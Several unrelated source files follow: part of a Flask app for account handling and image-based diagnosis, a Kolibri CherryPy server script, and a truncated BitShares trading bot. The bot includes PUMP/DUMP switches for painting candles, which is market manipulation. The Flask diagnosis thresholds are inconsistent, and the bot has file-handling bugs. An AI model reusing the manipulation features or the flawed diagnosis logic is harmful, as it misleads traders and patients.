return render_template('password_reset_email.html', form=form)
@app.route('/reset/<token>', methods=["GET", "POST"])
def reset_with_token(token):
try:
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
except:
flash('The password reset link is invalid or has expired.', 'error')
return redirect(url_for('login'))
form = PasswordForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=email).first_or_404()
except:
flash('Invalid email address!', 'error')
return redirect(url_for('login'))
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('login'))
return render_template('reset_password_with_token.html', form=form, token=token)
@app.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
if current_user.is_authenticated:
flash('Account already confirmed.', 'info')
else:
flash('Account already confirmed. Please login.', 'info')
return redirect(url_for('login'))
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.utcnow()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!')
return redirect(url_for('dashboard'))
@app.route('/resend_confirmation')
@login_required
def resend_email_confirmation():
if current_user.email_confirmed:
flash('Email is already confirmed.')
return redirect(url_for('edit_profile'))
try:
send_confirmation_email(current_user.email)
flash('Email sent to confirm your email address. Please check your email!', 'success')
except IntegrityError:
flash('Error! Unable to send email to confirm your email address.', 'error')
return redirect(url_for('edit_profile'))
@app.route('/change_password', methods=['GET', 'POST'])
@login_required
def change_password():
form = PasswordChangeForm()
if form.validate_on_submit():
if current_user.check_password(form.password.data):
current_user.set_password(form.password2.data)
flash('Your password has been changed.')
db.session.commit()
else:
flash('Your password is still the same.')
return redirect(url_for('change_password'))
if current_user.photo == None:
return render_template('password_change.html', form=form)
file_url = photos.url(current_user.photo)
return render_template('password_change.html', form=form, file_url=file_url)
@app.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm()
if form.validate_on_submit():
current_user.firstname = form.firstname.data
current_user.lastname = form.lastname.data
current_user.gender = form.gender.data
current_user.profession = form.profession.data
file = request.files['photo']
if file:
if current_user.photo != None:
file_path = photos.path(current_user.photo)
os.remove(file_path)
photos.save(file)
current_user.photo = file.filename
db.session.commit()
flash('Your changes have been saved.')
return redirect(url_for('edit_profile'))
elif request.method == 'GET':
form = EditProfileForm(current_user.email)
form.email.data = current_user.email
form.firstname.data = current_user.firstname
form.lastname.data = current_user.lastname
form.gender.data = str(current_user.gender)
form.profession.data = str(current_user.profession)
if current_user.photo == None:
return render_template('settings.html', title='Edit Profile', form=form)
file_url = photos.url(current_user.photo)
return render_template('settings.html', title='Edit Profile', form=form, file_url=file_url)
@app.route('/history', methods=['GET'])
@login_required
def history():
page = request.args.get('page', 1, type=int)
imag = History.query.filter().order_by(History.timestamp.desc()).paginate(
page, app.config['HISTORY_PER_PAGE'], False)
next_url = url_for('history', page=imag.next_num) \
if imag.has_next else None
prev_url = url_for('history', page=imag.prev_num) \
if imag.has_prev else None
if current_user.photo == None:
return render_template('history.html', imag=imag.items, next_url=next_url,
prev_url=prev_url)
file_url = photos.url(current_user.photo)
return render_template('history.html', file_url=file_url, imag=imag.items, next_url=next_url,
prev_url=prev_url)
@app.route('/dashboard', methods=['GET'])
@login_required
def dashboard():
form = UploadForm()
image_count = History.query.filter().order_by(History.timestamp.desc()).count()
if current_user.photo == None:
return render_template('dashboard.html', form=form, image_count=image_count)
file_url = photos.url(current_user.photo)
return render_template('dashboard.html', form=form, file_url=file_url, image_count=image_count)
@app.route('/dashboard', methods=['POST'])
@login_required
def upload_file():
# check if the post request has the file part
form = UploadForm()
if form.validate_on_submit():
file = request.files['photo']
ext = file.filename.rsplit('.', 1)[1]
timestr = time.strftime("%Y%m%d-%H%M%S")
today = dater.date.today()
todaystr = today.isoformat()
nam = timestr + "." + ext
filename = images.save(file, folder=todaystr, name=nam)
file_url = images.url(filename)
print(file_url)
# Decoding and pre-processing base64 image
img = load(file)
# Creating payload for TensorFlow serving request
data = json.dumps({"signature_name": "serving_default",
"instances": img.tolist()})
# # Making POST request
headers = {"content-type": "application/json"}
json_response = requests.post(
"IP_ROUTE", data=data, headers=headers)
# Decoding results from TensorFlow Serving server
predictions = json_response.json()['predictions'][0][0]
# Give a true or false value to the prediction
if predictions == 1:
predictval = 0
elif predictions < 1 and predictions > 0.6:
predictval = 1
else:
predictval = 0
# Save to database
upload = History(photo=filename, patient=form.patient.data,
photo_url=file_url, user_email=current_user.email, status=predictval)
db.session.add(upload)
db.session.commit()
# Give diagnosis
if predictval == 1:
resultstat = 'POSITIVE'
elif predictval == 0:
resultstat = 'NEGATIVE'
flash(resultstat)
return redirect(url_for("dashboard"))
image_count = History.query.filter().order_by(History.timestamp.desc()).count()
if current_user.photo == None:
return render_template('dashboard.html', form=form, image_count=image_count)
file_url = photos.url(current_user.photo)
return render_template("dashboard.html", form=form, file_url=file_url, image_count=image_count)
@app.route('/delete/<folder>/<filename>')
@login_required
def delete_file(folder, filename):
if current_user.email != "admin@example.com":
flash('Sorry only admin can delete images')
return redirect(url_for('history'))
file_p = folder+"/"+filename
file_path = images.path(folder+"/"+filename)
item = History.query.filter_by(photo=file_p).first_or_404()
db.session.delete(item)
db.session.commit()
os.remove(file_path)
return redirect(url_for('history'))
@app.route('/view/<folder>/<filename>')
@login_required
def view_file(folder, filename):
file_p = folder+"/"+filename
file_url = images.url(file_p)
item = History.query.filter_by(photo=file_p).first_or_404()
if current_user.photo == None:
return render_template("browser.html", file_url=file_url, item=item)
file_ur = photos.url(current_user.photo)
return render_template("browser.html", file_url=file_url, item=item, profilepic=file_ur)
@app.route('/about')
def about():
return render_template('about.html')
# route and function to handle the upload page
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.before_request
def before_request():
session.permanent = True
app.permanent_session_lifetime = timedelta(minutes=15)
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, text_body, html_body):
msg = Message(subject, recipients=recipients)
msg.body = text_body
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for('confirm_email',token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),_external=True)
html = render_template('email_confirmation.html',confirm_url=confirm_url)
send_email('Confirm Your Email Address', [user_email], html, html)
def send_password_reset_email(user_email):
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
password_reset_url = url_for('reset_with_token',token=password_reset_serializer.dumps(user_email, salt='password-reset-salt'),_external=True)
html = render_template('email_password_reset.html',password_reset_url=password_reset_url)
send_email('Password Reset Requested', [user_email], html, html)
|
server.py | import os
import atexit
import multiprocessing
import cherrypy
from django.conf import settings
from django.core.management import call_command
from kolibri.content.utils import paths
from kolibri.content.utils.annotation import update_channel_metadata_cache
from kolibri.deployment.default.wsgi import application
def start_background_workers():
p = multiprocessing.Process(target=call_command, args=("qcluster",))
# note: atexit normally only runs when python exits normally, aka doesn't
# exit through a signal. However, this function gets run because cherrypy
# catches all the various signals, and runs the atexit callbacks.
atexit.register(p.terminate)
p.start()
def start():
# TODO(aronasorman): move to install/plugin-enabling scripts, and remove from here
call_command("collectstatic", interactive=False)
call_command("collectstatic_js_reverse", interactive=False)
call_command("migrate", interactive=False, database="default")
call_command("migrate", interactive=False, database="ormq")
# start the qcluster process
start_background_workers()
update_channel_metadata_cache()
run_server()
def run_server():
# Mount the application
cherrypy.tree.graft(application, "/")
serve_static_dir(settings.STATIC_ROOT, settings.STATIC_URL)
serve_static_dir(settings.CONTENT_DATABASE_DIR, paths.get_content_database_url("/"))
serve_static_dir(settings.CONTENT_STORAGE_DIR, paths.get_content_storage_url("/"))
# Unsubscribe the default server
cherrypy.server.unsubscribe()
cherrypy.config.update({'server.socket_host': "0.0.0.0",
'server.socket_port': 8080,
'server.thread_pool': 30,
'log.screen': True})
# Instantiate a new server object
server = cherrypy._cpserver.Server()
# Subscribe this server
server.subscribe()
# Start the server engine (Option 1 *and* 2)
cherrypy.engine.start()
cherrypy.engine.block()
def serve_static_dir(root, url):
static_handler = cherrypy.tools.staticdir.handler(
section="/",
dir=os.path.split(root)[1],
root=os.path.abspath(os.path.split(root)[0])
)
cherrypy.tree.mount(static_handler, url)
|
EV0.00000002.py | #=======================================================================
VERSION = 'EXTINCTION EVENT v0.00000002 alpha release'
#=======================================================================
# python modules
import os
import sys
import json
import time
import math
import random
import warnings
import requests
import matplotlib
import numpy as np
from random import random, shuffle, randint
from getpass import getpass
from datetime import datetime
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
import matplotlib.dates as mdates
from ast import literal_eval as literal
from statistics import mean, median, mode
from multiprocessing import Process, Value, Array
# bitshares modules
from bitshares import BitShares
from bitshares.market import Market
from bitshares.account import Account
from bitshares.blockchain import Blockchain
SATOSHI = 0.00000001
ANTISAT = 1 / SATOSHI
def banner():
#===================================================================
'''
March 2018:
Possible Hack Of Third-Party Tools Affects Binance Exchange Users.
: Cointelegraph
Statement on Potentially Unlawful Online Digital Asset Platforms
: SEC.gov
I stand upon the shoulders of giants and as such,
invite you to stand upon mine.
Use my work with or without attribution;
I make no claim of "intellectual property."
My ideas are the result of countless millenia of evolution
- they belong to humanity.
: Jameson Lopp @lopp
NOTE THIS IS ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY
#
# https://www.youtube.com/watch?v=5xouOnHxYUw
# https://www.youtube.com/watch?v=jJxKXOTNXjc
#
# Rated R Under 17 NOT Admitted Without Parent
#
# My liability is ZERO; "this script licenced: don't be a bitch^TM"
#
# WTFPLv2 March 1765
#
use this, get lambo, deposit 7.777% skriptbunny tithing here:
(BTS) litepresence1
(BTC) 374gjPuhokrWj8KJu8NnMBGzpbHWcVeE1k
#
# 0.05 BTC each for AI tuned to last 365 days of any alt/btc pair
# 1 BTC each for machine optimized algo for top 100 alt/btc pair
#
# litepresence @ pastecoin.com for sales
# finitestate@tutamail for inquiries
#
########################
#
# THE DESTROYER,
# litepresence - 2018
#
'''
#===================================================================
''' FEATURES '''
#===================================================================
'''
ALT/BTC data from cryptocompare.com as signal
Bitshares DEX open.ALT/open.BTC for trading
- Play simple effective 4 state 50 day cross
- uses live 2h arrays to generate moving averages
- ma1xma2 is about 17x50 day simple moving average cross
- cross plus +/- threshold changes state logic from bull to bear
- Bull Logic
buy 17 day support
sell 17 day x ~1.5 selloff
- Bear logic
sell 17 day resistance
buy 17 day x ~0.75 despair
- dynamic stoploss upon market shift
- approximately 7-20 day trade frequency depending upon pair
- announces machine state on plot
- Make Markets, Close Margins, Support Trends
- Iceberg entry and exit
- Bot runs local
- Backtest Engine Included
- Maintains storage from backtest to live session
'''
#===================================================================
''' FEATURES v0.00000002'''
#===================================================================
'''
Rogue Node Immunity:
A background daemon process maintains a list of low latency nodes
for buy/sell/cancel/orders ops in a text file
distributed exchange prices and orderbook are verified and curated
using multinode statistical approach with daemon processes
open orders are checked in triplicate on multiple nodes
dex() definitions have been upgraded after consultation with
Bitshares core developers and node admin
Move to github:
https://github.com/litepresence/extinction-event
New MODES:
SALES mode backtest only plots buy/sell actions; no state machine
LATENCY mode connect to all nodes and reports on latency
PAPER mode runs live, but does not trade
'''
#===================================================================
''' DEPENDENCIES'''
#===================================================================
'''
python 3.4
python-tk
matplotlib 1.4
pybitshares
h/t @ cryptocompare.com
'''
# USER CONTROLS
def tune_install(): # Basic User Controls
global CURRENCY, ASSET, MA1, MA2
global SELLOFF, SUPPORT, RESISTANCE, DESPAIR
global MIN_CROSS, MAX_CROSS, BULL_STOP, BEAR_STOP
global DPT, ROI, APY
APY = DPT = ROI = 1.0
CURRENCY = "BTC"
# INSTALL KEYS
ASSET = "BTS"
MA1 = 17.00
MA2 = 50.00
SELLOFF = 2.250
SUPPORT = 1.000
RESISTANCE = 1.000
DESPAIR = 0.525
MIN_CROSS = 1.000
MAX_CROSS = 1.000
BULL_STOP = 1.000
BEAR_STOP = 1.000
def control_panel(): # Advanced User Controls
global LIVE, CURRENCY, ASSET, MA1, MA2, MA3, MA4, RECYCLE
global PETTY, MIN_MARGIN, TICK, TICK_TIMING, TICK_MINIMUM, DUMP
global CANDLE, START_ASSETS, START_CURRENCY, ICEBERG
global ANIMATE, STORAGE_RESET, CURRENCY_STOP, MAX_CURRENCY, PUMP
global LIVE_PLOT_DEPTH, BELL, FORCE_ALPHA, PAPER, LATENCY
global DEPTH, BACKTEST, PAIR, MAX_ASSETS, SALES
global RESOLUTION, OPTIMIZATIONS, MARKET_CROSS, OPTIMIZE, SCALP
global MANUAL_OVERRIDE, MANUAL_BUY, MANUAL_SELL
# optimizer
RESOLUTION = 20
OPTIMIZATIONS = 10000
# backtest
START_ASSETS = 0
START_CURRENCY = 1
# initial backtest market state (True is "BULL")
MARKET_CROSS = True
# max percent may invest in:
# 100 = "all in" ; 10 = "10 percent in"
MAX_ASSETS = 50
MAX_CURRENCY = 100
# iceberg
ICEBERG = 1 # currency terms
PETTY = 100000 # assets terms
# scalp thresholds
# ENTER OWN RISK &&&&
SCALP = False # maintain market maker iceberg margins
PUMP = False # paint candles green (this costs money)
DUMP = False # paint candles red (this costs money)
RECYCLE = False # maintain funding for pump/dump ops
SCALP_FUND = 0.010 # 0.01 = 1% of holdings reserved for scalping
MIN_MARGIN = 0.030 # about 0.030
MA3 = 0.500 # about 0.500
MA4 = 0.166 # about 0.166
# force buy/sell thresholds manually
MANUAL_OVERRIDE = False
MANUAL_BUY = SATOSHI
MANUAL_SELL = ANTISAT
# Manual Override Alpha State when live
FORCE_ALPHA = False # Options: ( False, 'BULL', 'BEAR' )
# hft timing in seconds
TICK = 60
TICK_TIMING = 51
TICK_MINIMUM = 30
# backtest
ANIMATE = False
STORAGE_RESET = False
CURRENCY_STOP = False
# live window
LIVE_PLOT_DEPTH = 86400 # 86400 = 1 day
BELL = False # sound linux alarm when tick fails
# constants
# 0 1 2 3 4 5
CANDLE = 86400
OPTIMIZE = BACKTEST = PAPER = LIVE = SALES = LATENCY = False
if MODE == 0:
OPTIMIZE = True
if MODE == 1:
BACKTEST = True
OPTIMIZATIONS = 0
if MODE == 2:
PAPER = True
MAX_ASSETS = 0
MAX_CURRENCY = 0
if MODE in [2, 3]:
LIVE = True
CANDLE = 7200
OPTIMIZATIONS = 0
print(('BOT MAY SPEND: ', MAX_ASSETS, 'PERCENT CURRENCY'))
print(('BOT MAY LIQUIDATE: ', MAX_CURRENCY, 'PERCENT ASSETS'))
if MODE == 4:
BACKTEST = True
SALES = True
OPTIMIZATIONS = 0
if MODE == 5:
LATENCY = True
DEPTH = int(max(MA1, MA2) * (86400 / CANDLE) + 50)
PAIR = ('%s_%s' % (CURRENCY, ASSET))
# BITSHARES DEX
def keys_install(): # Bitshares Keys
global BitCURRENCY, BitASSET, ACCOUNT, PASS_PHRASE
global BitPAIR, MARKET, CHAIN, MODE
MODE = 999
print('0:OPTIMIZE, 1:BACKTEST, 2:PAPER, 3:LIVE, 4:SALES, 5: LATENCY')
while MODE not in [0, 1, 2, 3, 4, 5]:
MODE = int(input('TRADING MODE: '))
print('')
BitCURRENCY = 'OPEN.' + CURRENCY
if ASSET == 'BTS':
BitASSET = 'BTS'
else:
BitASSET = 'OPEN.' + ASSET
BitPAIR = BitASSET + ":" + BitCURRENCY
if MODE in [2, 3]:
try:
ACCOUNT = Account(input(' account: '))
except Exception as ex:
print (type(ex).__name__)
sys.exit()
PASS_PHRASE = getpass(prompt=' pass phrase: ')
n = ['wss://us.nodes.bitshares.works/wss',
'wss://us.nodes.bitshares.ws/wss',
'wss://eu-west-1.bts.crypto-bridge.org/wss',
'wss://eu.nodes.bitshares.ws/wss',
'wss://us-east-1.bts.crypto-bridge.org/wss']
MARKET = Market(BitPAIR, bitshares_instance=BitShares(n), mode='head')
try:
MARKET.bitshares.wallet.unlock(PASS_PHRASE)
except Exception as ex:
print (type(ex).__name__)
sys.exit()
print('')
CHAIN = Blockchain(bitshares_instance=BitShares(n), mode='head')
nodes_update()
def race_read(doc=''): # Concurrent Read from File Operation
opened = 0
while not opened:
try:
with open(doc, 'r') as f:
ret = literal(f.read())
opened = 1
except Exception as e:
print (e, type(e).__name__, e.args)
print (str(doc) + ' RACE READ, try again...')
pass
return ret
def race_write(doc='', text=''): # Concurrent Write to File Operation
opened = 0
while not opened:
try:
with open(doc, 'w+') as f:
f.write(str(text))
opened = 1
except Exception as e:
print (e, type(e).__name__, e.args)
print (str(doc) + ' RACE WRITE, try again...')
pass
def race_append(doc='', text=''): # Concurrent Append to File Operation
opened = 0
while not opened:
try:
with open('doc', 'a+') as f:
f.write(str(text))
opened = 1
except Exception as e:
print (e, type(e).__name__, e.args)
print (str(doc) + ' RACE APPEND, try again...')
pass
def dex( # Public AND Private API Bitshares
command, amount=ANTISAT, price=None,
depth=1, expiration=ANTISAT):
attempt = 1
nds = nodes()
while attempt:
try:
MARKET = Market(
BitPAIR, bitshares_instance=BitShares(nds), mode='head')
CHAIN = Blockchain(
bitshares_instance=BitShares(nds), mode='head')
MARKET.bitshares.wallet.unlock(PASS_PHRASE)
ACCOUNT.refresh()
attempt = 0
except Exception as ex:
print (type(ex).__name__, ex.args)
print (nds)
print (BitPAIR, attempt, time.ctime())
attempt += 1
nd = nds.pop(0)
nds.append(nd)
print (nd)
pass
if command == 'buy':
# buy relentlessly until satisfied or currency exhausted
print(('Bitshares API', command))
if price is None:
price = ANTISAT
print(('buying', amount, 'at', price))
attempt = 1
currency = float(ACCOUNT.balance(BitCURRENCY))
if amount > 0.998 * currency * price:
amount = 0.998 * currency * price
if amount > 0:
while attempt:
try:
details = (MARKET.buy(price, amount, expiration))
print (details)
attempt = 0
except:
print(("buy attempt %s failed" % attempt))
attempt += 1
if attempt > 10:
print ('buy aborted')
return
pass
else:
print('no currency to buy')
if command == 'sell':
# sell relentlessly until satisfied or assets exhausted
expiration = 86400 * 7
print(('Bitshares API', command))
if price is None:
price = SATOSHI
print(('selling', amount, 'at', price))
attempt = 1
assets = float(ACCOUNT.balance(BitASSET))
if amount > 0.998 * assets:
amount = 0.998 * assets
if amount > 0:
while attempt:
try:
details = (MARKET.sell(price, amount, expiration))
print (details)
attempt = 0
except:
print(("sell attempt %s failed" % attempt))
attempt += 1
if attempt > 10:
print ('sell aborted')
return
pass
else:
print('no assets to sell')
if command == 'cancel':
# cancel all orders in this MARKET relentlessly until satisfied
print(('Bitshares API', command))
orders = MARKET.accountopenorders()
print((len(orders), 'open orders to cancel'))
if len(orders):
attempt = 1
order_list = []
for order in orders:
order_list.append(order['id'])
while attempt:
try:
details = MARKET.cancel(order_list)
print (details)
attempt = 0
except:
print((attempt, 'cancel failed', order_list))
attempt += 1
if attempt > 10:
print ('cancel aborted')
return
pass
if command == 'orders':
# cycle through nodes until triplicate-consecutive is found
servers = nodes()
orders_list = []
satisfied = 0
while not satisfied:
sorders = [str(i) for i in orders_list]
if (len(sorders) >= 3) and len(set(sorders[-3:])) == 1:
orders = orders_list[-1]
satisfied = 1
else:
try:
market = Market(
BitPAIR,
bitshares_instance=BitShares(
servers[0],
num_retries=0))
except:
print('dex orders server down %s' % server[0])
pass
market.bitshares.wallet.unlock(PASS_PHRASE)
ACCOUNT.refresh()
# dictionary of open orders in traditional format:
# orderNumber, orderType, market, amount, price
print(('Bitshares API', command))
orders = []
for order in MARKET.accountopenorders():
orderNumber = order['id']
asset = order['base']['symbol']
currency = order['quote']['symbol']
amount = float(order['base'])
price = float(order['price'])
orderType = 'buy'
if asset == BitASSET:
orderType = 'sell'
price = 1 / price
orders.append({'orderNumber': orderNumber,
'orderType': orderType,
'market': BitPAIR,
'amount': amount,
'price': price})
orders_list.append(orders)
servers.append(servers.pop(0)) # cycle server list
for o in orders:
print (o)
if len(orders) == 0:
print ('no open orders')
return orders
if command == 'market_balances':
# dictionary of currency and assets in this MARKET
print(('Bitshares API', command))
currency = float(ACCOUNT.balance(BitCURRENCY))
assets = float(ACCOUNT.balance(BitASSET))
balances = {'currency': currency, 'assets': assets}
print (balances)
return balances
if command == 'complete_balances':
# dictionary of ALL account balances
print(('Bitshares API', command))
raw = list(ACCOUNT.balances)
balances = {}
for i in range(len(raw)):
balances[raw[i]['symbol']] = float(raw[i]['amount'])
print (balances)
return balances
if command == 'book':
return race_read('book.txt')
if command == 'last':
return race_read('last.txt')
if command == 'account_value':
# dictionary account value in BTS BTC and USD
print(('Bitshares API', command))
raw = list(ACCOUNT.balances)
balances = {}
for i in range(len(raw)):
balances[raw[i]['symbol']] = float(raw[i]['amount'])
btc_value = 0
for asset, amount in list(balances.items()):
market_pair = 'OPEN.BTC:' + asset
market = Market(market_pair)
price = float(market.ticker()['latest'])
try:
value = amount / price
except:
value = 0
if value < 0.0001:
value = 0
else:
if asset != 'USD':
price = 1 / (price + SATOSHI)
print((('%.4f' % value), 'OPEN.BTC', ('%.2f' % amount),
asset, '@', ('%.8f' % price)))
btc_value += value
market_pair = 'OPEN.BTC:USD'
market = Market(market_pair)
price = float(market.ticker()['latest'])
usd_value = btc_value * price
market_pair = 'OPEN.BTC:BTS'
market = Market(market_pair)
price = float(market.ticker()['latest'])
bts_value = btc_value * price
print((('%.2f' % bts_value), 'BTS',
('%.4f' % btc_value), 'OPEN.BTC',
('%.2f' % usd_value), 'bitUSD'))
return bts_value, btc_value, usd_value
if command == 'blocktime':
start = time.time()
current_block = CHAIN.get_current_block_num()
ping = time.time() - start
blocktime = CHAIN.block_time(current_block)
blocktimestamp = CHAIN.block_timestamp(current_block)
now = time.time()
block_latency = now - blocktimestamp
print(('block :', current_block))
# print(('blocktime :', blocktime))
# print(('stamp :', blocktimestamp))
# print(('ctime(stamp) :', time.ctime(blocktimestamp)))
# print(('now :', now))
print(('dex blocktime :', ('%.2f' % block_latency)))
print(('dex ping :', ('%.2f' % ping)))
return current_block, blocktimestamp, block_latency, ping
def nodes(): # Fetch nodes.txt
return race_read('nodes.txt')
def nodes_process( # Write nodes.txt
timeout=20, pings=999999, crop=99, noprint=False, write=False,
include=False, exclude=False, suffix=True, master=False):
ID = '4018d7844c78f6a6c41c6a552b898022310fc5dec06da467ee7905a8dad512c8'
# timeout : seconds to ping until abort per node
# pings : # of good nodes to find until satisfied (0 none, 999 all)
# suffix : checks each node for no suffix plus with /ws or /wss
# noprint : disables printing, only returns list of good nodes
# master : check only nodes listed in bitshares/ui/master
# crop : return only best nodes
# write : maintains an output file nodes.txt with list of best nodes
# include and exclude custom nodes
included, excluded = [], []
if include:
included = ['wss://bts-seoul.clockwork.gr']
if exclude:
excluded = []
# web scraping methods
def clean(raw):
return ((str(raw).replace('"', " "))
.replace("'", " ")).replace(',', ' ')
def parse(cleaned):
return [t for t in cleaned.split() if t.startswith('wss')]
def validate(parsed):
v = parsed
for i in range(len(v)):
if v[i].endswith('/'):
v[i] = v[i][:-1]
for i in range(len(v)):
if v[i].endswith('/ws'):
v[i] = v[i][:-3]
for i in range(len(v)):
if v[i].endswith('/wss'):
v[i] = v[i][:-4]
# these are known to require /ws extension
ws = ['wss://relinked.com',
'wss://bitshares.crypto.fans',
'wss://this.uptick.rocks']
if suffix:
wss = [(i + '/wss') for i in v]
ws = [(i + '/ws') for i in v]
v = v + wss + ws
else:
for i in range(len(v)):
if v[i] in ws:
v[i] += '/ws'
else:
v[i] += '/wss'
return v
# ping the blockchain and return latency
def ping(n, num, arr):
try:
start = time.time()
chain = Blockchain(
bitshares_instance=BitShares(n, num_retries=0), mode='head')
# print(n,chain.rpc.chain_params["chain_id"])
ping_latency = time.time() - start
current_block = chain.get_current_block_num()
blocktimestamp = abs(
chain.block_timestamp(current_block)) # + utc_offset)
block_latency = time.time() - blocktimestamp
# print (blocktimestamp)
# print (time.time())
# print (block_latency)
# print (ping_latency)
# print (time.ctime())
# print (utc_offset)
# print (chain.get_network())
if chain.get_network()['chain_id'] != ID:
num.value = 333333
elif block_latency < (ping_latency + 4):
num.value = ping_latency
else:
num.value = 111111
except:
num.value = 222222
pass
# Disable / Enable printing
def blockPrint():
if noprint:
sys.stdout = open(os.devnull, 'w')
def enablePrint():
if noprint:
sys.stdout = sys.__stdout__
# gather list of nodes from github
blockPrint()
begin = time.time()
utc_offset = (datetime.fromtimestamp(begin) -
datetime.utcfromtimestamp(begin)).total_seconds()
print ('=====================================')
print(('found %s nodes stored in script' % len(included)))
urls = []
# scrape from github
git = 'https://raw.githubusercontent.com'
url = git + '/bitshares/bitshares-ui/master/app/api/apiConfig.js'
urls.append(url)
if not master:
url = git + '/bitshares/bitshares-ui/staging/app/api/apiConfig.js'
urls.append(url)
url = git + '/CryptoBridge/cryptobridge-ui/'
url += 'e5214ad63a41bd6de1333fd98d717b37e1a52f77/app/api/apiConfig.js'
urls.append(url)
url = git + '/litepresence/extinction-event/master/bitshares-nodes.py'
urls.append(url)
# searched selected sites for Bitshares nodes
validated = [] + included
for u in urls:
attempts = 3
while attempts > 0:
try:
raw = requests.get(u).text
v = validate(parse(clean(raw)))
print(('found %s nodes at %s' % (len(v), u[:65])))
validated += v
attempts = 0
except:
print(('failed to connect to %s' % u))
attempts -= 1
pass
# remove known bad nodes from test
if len(excluded):
excluded = sorted(excluded)
print(('remove %s known bad nodes' % len(excluded)))
validated = [i for i in validated if i not in excluded]
validated = sorted(list(set(validate(parse(clean(validated))))))
# attempt to contact each websocket
print ('=====================================')
print(('found %s total nodes - no duplicates' % len(validated)))
print ('=====================================')
print (validated)
pinging = min(pings, len(validated))
if pinging:
print ('=====================================')
enablePrint()
print(('%s pinging %s nodes; timeout %s sec; est %.1f minutes' % (
time.ctime(), pinging, timeout, timeout * len(validated) / 60.0)))
blockPrint()
print ('=====================================')
pinged, timed, down, stale, expired, testnet = [], [], [], [], [], []
for n in validated:
if len(pinged) < pinging:
# use multiprocessing module to enforce timeout
num = Value('d', 999999)
arr = Array('i', list(range(0)))
p = Process(target=ping, args=(n, num, arr))
p.start()
p.join(timeout)
if p.is_alive() or (num.value > timeout):
p.terminate()
p.join()
if num.value == 111111: # head block is stale
stale.append(n)
elif num.value == 222222: # connect failed
down.append(n)
elif num.value == 333333: # connect failed
testnet.append(n)
elif num.value == 999999: # timeout reached
expired.append(n)
else:
pinged.append(n) # connect success
timed.append(num.value) # connect success time
print(('ping:', ('%.2f' % num.value), n))
# sort websockets by latency
pinged = [x for _, x in sorted(zip(timed, pinged))]
timed = sorted(timed)
unknown = sorted(
list(set(validated).difference(
pinged + down + stale + expired + testnet)))
# report outcome
if len(excluded):
for i in range(len(excluded)):
print(('EXCLUDED', excluded[i]))
if len(unknown):
for i in range(len(unknown)):
print(('UNTESTED', unknown[i]))
if len(testnet):
for i in range(len(testnet)):
print(('TESTNET', testnet[i]))
if len(expired):
for i in range(len(expired)):
print(('TIMEOUT', expired[i]))
if len(stale):
for i in range(len(stale)):
print(('STALE', stale[i]))
if len(down):
for i in range(len(down)):
print(('DOWN', down[i]))
if len(pinged):
print ('')
print ('GOOD nodes:')
print ('')
for i in range(len(pinged)):
print((('%.2f' % timed[i]), pinged[i]))
if pinging:
print('')
print((len(pinged), 'of', len(validated),
'nodes are active with latency less than', timeout))
print('')
print(
('fastest node',
pinged[0],
'with latency',
('%.2f' % timed[0])))
print('')
ret = pinged[:crop]
else:
ret = validated[:crop]
print ('')
enablePrint()
elapsed = time.time() - begin
print ('elapsed:', ('%.1f' % elapsed), 'TOP ', len(ret))
print('')
print (ret)
if write and (len(ret) == crop):
race_write('nodes.txt', text=ret)
return (ret)
def nodes_loop(): # Run nodes process in loop
while True:
try:
nodes_process(
timeout=5, pings=999, crop=10, noprint=True, write=True,
include=True, exclude=False, suffix=False, master=False)
time.sleep(300)
# no matter what happens just keep verifying book
except Exception as e:
print (type(e).__name__, e.args, e)
pass
def nodes_update(): # Run nodes process once
print('Acquiring low latency connection to Bitshares DEX' +
', this may take a few minutes...')
updated = 0
try:
while not updated:
nodes_process(
timeout=5, pings=999, crop=10, noprint=False, write=True,
include=True, exclude=False, suffix=False, master=False)
updated = 1
# not satisfied until verified once
except Exception as e:
print (type(e).__name__, e.args, e)
pass
print('')
print('DEX CONNECTION ESTABLISHED - will refresh every 5 minutes')
print('')
def last_process(): # Write last.txt
def dex_last(market): # returns latest price on given market(node)
return float(market.ticker()['latest'])
def market(n): # returns market class using node "n"
return Market(BitPAIR, bitshares_instance=BitShares(n, num_retries=0))
# fetch list of good nodes from file maintained by nodes.py
node_list = nodes()
# fetch last price from 5 dex nodes
start = time.time()
last_list = []
nodes_used = []
for i in range(len(node_list)):
if len(last_list) < 5:
try:
m = market(node_list[i])
ret = satoshi(dex_last(m))
last_list.append(ret)
nodes_used.append(node_list[i])
except:
pass
# calculate relative range
rrange = (max(last_list) - min(last_list)) / mean(last_list)
# check last list and return best last price with message
msg = ''
if len(set(last_list)) == 1:
last = last_list[-1]
msg += 'common'
else:
try:
last = mode(last_list)
msg += 'mode'
except:
last = median(last_list)
msg += 'median'
# override median or mode with latest if less than 2%
# difference
if rrange < 0.02:
last = last_list[-1]
msg = 'latest (' + msg + ')'
else:
# create blacklist.txt if relative range too wide
print('')
print(time.ctime(), str(last), str(rrange))
print(str(last_list))
print(str(nodes_used))
blacklist = ''
blacklist += "\n" + "\n" + str(time.ctime())
blacklist += "\n" + str(last)
blacklist += "\n" + str(rrange)
blacklist += "\n" + str(last_list)
blacklist += "\n" + str(nodes_used)
race_append('blacklist.txt', blacklist)
# maintain a log of last price, relative range, and statistics type
